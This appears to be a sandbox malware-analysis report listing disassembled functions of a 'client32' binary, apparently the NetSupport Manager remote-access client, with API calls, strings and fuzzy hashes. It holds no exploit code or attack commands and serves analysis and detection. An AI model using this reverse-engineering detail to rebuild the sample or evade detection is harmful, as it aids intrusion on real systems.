                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                • String ID:
                                                                                • API String ID: 938513278-0
                                                                                • Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                • Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
                                                                                • Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                • Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B
                                                                                Function 11053280 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                  • Part of subcall function 11145410: GetSystemMetrics.USER32(0000005E), ref: 1114542A
                                                                                  • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC387
                                                                                  • Part of subcall function 110CC360: GetWindowRect.USER32(00000000), ref: 110CC38A
                                                                                  • Part of subcall function 110CC360: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CC39C
                                                                                  • Part of subcall function 110CC360: MapDialogRect.USER32(00000000,?), ref: 110CC3C8
                                                                                  • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC401
                                                                                  • Part of subcall function 110CC360: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
                                                                                  • Part of subcall function 110183B0: GetSystemMetrics.USER32(0000005E), ref: 110183BF
                                                                                  • Part of subcall function 110183B0: GetSystemMetrics.USER32(00002003), ref: 110183DF
                                                                                • std::exception::exception.LIBCMT ref: 11053483
                                                                                • __CxxThrowException@8.LIBCMT ref: 11053498
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$ItemMetricsRectSystem$DialogException@8ObjectPointsShowTextThrowstd::exception::exception
                                                                                • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                • API String ID: 2181554437-3415836059
                                                                                • Opcode ID: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                                • Instruction ID: 43705d0265472f43c13063854f38501adaeacc0369148bb5472ef3ca99b46591
                                                                                • Opcode Fuzzy Hash: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                                • Instruction Fuzzy Hash: 1E519375E00209AFDB45DF94CD81EEEF7B9FF44308F108569E5066B281EB35AA05CB91
                                                                                Function 110218D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$VisibleWindow
                                                                                • String ID: %d,%d,%d,%d,%d,%d
                                                                                • API String ID: 1671172596-1913222166
                                                                                • Opcode ID: eef60ca5cad2aaf85d34c80ad1b5db7222e23259f3c31fef37829276a8a7ef1d
                                                                                • Instruction ID: 6217bdbd462a20bf08026d4811e8c1ad77ae889b3603263953c56721c7b36dbb
                                                                                • Opcode Fuzzy Hash: eef60ca5cad2aaf85d34c80ad1b5db7222e23259f3c31fef37829276a8a7ef1d
                                                                                • Instruction Fuzzy Hash: AD519F74700215AFD710DB68CC90FAAB7F9BF88704F108699E65A9B391DB70ED45CBA0
                                                                                Function 11067090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick
                                                                                • String ID: General$TicklePeriod
                                                                                • API String ID: 536389180-1546705386
                                                                                • Opcode ID: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                • Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
                                                                                • Opcode Fuzzy Hash: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                • Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91
                                                                                Function 11019B00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 11019C2A
                                                                                Strings
                                                                                • !"NOT IMPLEMENTED", xrefs: 11019C3A
                                                                                • vector<T> too long, xrefs: 11019C25
                                                                                • ..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp, xrefs: 11019C35
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                • String ID: !"NOT IMPLEMENTED"$..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp$vector<T> too long
                                                                                • API String ID: 909987262-1355409292
                                                                                • Opcode ID: defab152e2a2a034fa8a3a53941102f1edd972b6cf5954f827a95ad610d094cb
                                                                                • Instruction ID: fc840e911b847fc855133020e95c2a3ba51fe97c4fb46b87c4a8b304b90ffd87
                                                                                • Opcode Fuzzy Hash: defab152e2a2a034fa8a3a53941102f1edd972b6cf5954f827a95ad610d094cb
                                                                                • Instruction Fuzzy Hash: DA41E875F002068FCB1CCE68CDD05AEB7E6F784219B648A3ED927C7688F635E9008751
                                                                                Function 110774D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 11077511
                                                                                • CopyRect.USER32(?,00000004), ref: 1107753F
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 110774FE
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110774F9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 2755825785-2830328467
                                                                                • Opcode ID: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
                                                                                • Instruction ID: 59158522108a3a71f1e5bb0466e943617169e98ae829cc3baa7e2fe2b27ff523
                                                                                • Opcode Fuzzy Hash: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
                                                                                • Instruction Fuzzy Hash: 5841C271E00B46DBCB15CF68C9C8B6EB7F1EF44344F10856AD8569B644EBB0E940CB98
                                                                                Function 11031B50 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • Exit Win10 Start screen (%s), xrefs: 11031BA6
                                                                                • Error. WindowsD not generated, xrefs: 11031C52
                                                                                • Error. ExitMetro code cannot init kbfilter, xrefs: 11031C39
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle_memset$ClassCodeCursorExitFromNameObjectOpenPointProcessSingleVersionWaitWindow_strncpywsprintf
                                                                                • String ID: Error. ExitMetro code cannot init kbfilter$Error. WindowsD not generated$Exit Win10 Start screen (%s)
                                                                                • API String ID: 2171401249-3225996774
                                                                                • Opcode ID: 64892938fa0b6c1ee6d66ac4cfd7e9802a1b46fe4b434297f23fe30ead13f557
                                                                                • Instruction ID: fa832722e0390e9f8a25bf370b451ec2a36a1e68e963bc0416f7044736d9f8e9
                                                                                • Opcode Fuzzy Hash: 64892938fa0b6c1ee6d66ac4cfd7e9802a1b46fe4b434297f23fe30ead13f557
                                                                                • Instruction Fuzzy Hash: CD31297AD14219AFE715CFD49C417AEB7F8DB45619F0042AADC15937C0EB316500CBD1
                                                                                Function 110D12E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memmove.LIBCMT ref: 110D1378
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                • API String ID: 1528188558-323366856
                                                                                • Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                • Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
                                                                                • Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                • Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398
                                                                                Function 110896B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,0000000E), ref: 11160E88
                                                                                  • Part of subcall function 11160D17: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 11160D4F
                                                                                  • Part of subcall function 11160D17: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 11160D90
                                                                                  • Part of subcall function 11160D17: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 11160DB4
                                                                                  • Part of subcall function 11160D17: RegCloseKey.ADVAPI32(?), ref: 11160DE1
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 11160E4A
                                                                                • LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 11160E60
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                                • String ID: hhctrl.ocx
                                                                                • API String ID: 1060647816-2298675154
                                                                                • Opcode ID: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
                                                                                • Instruction ID: 29a85e5adb823bcef9c03dae075ae2b4ea3bdd8fdf15b4c5e271eae4de8d38be
                                                                                • Opcode Fuzzy Hash: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
                                                                                • Instruction Fuzzy Hash: DF118E7170423A9BDB05CFA9CD90AAAF7BCEB4C708B00047DE511D3244EBB2E958CB50
                                                                                Function 11005940 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 11005981
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110059BC
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcessReleasewsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 3704029381-2830328467
                                                                                • Opcode ID: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
                                                                                • Instruction ID: 1cf781a21872bd9441bcd9bb2c78fcf7fe1041f1c585c9da4a5e29128da7e192
                                                                                • Opcode Fuzzy Hash: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
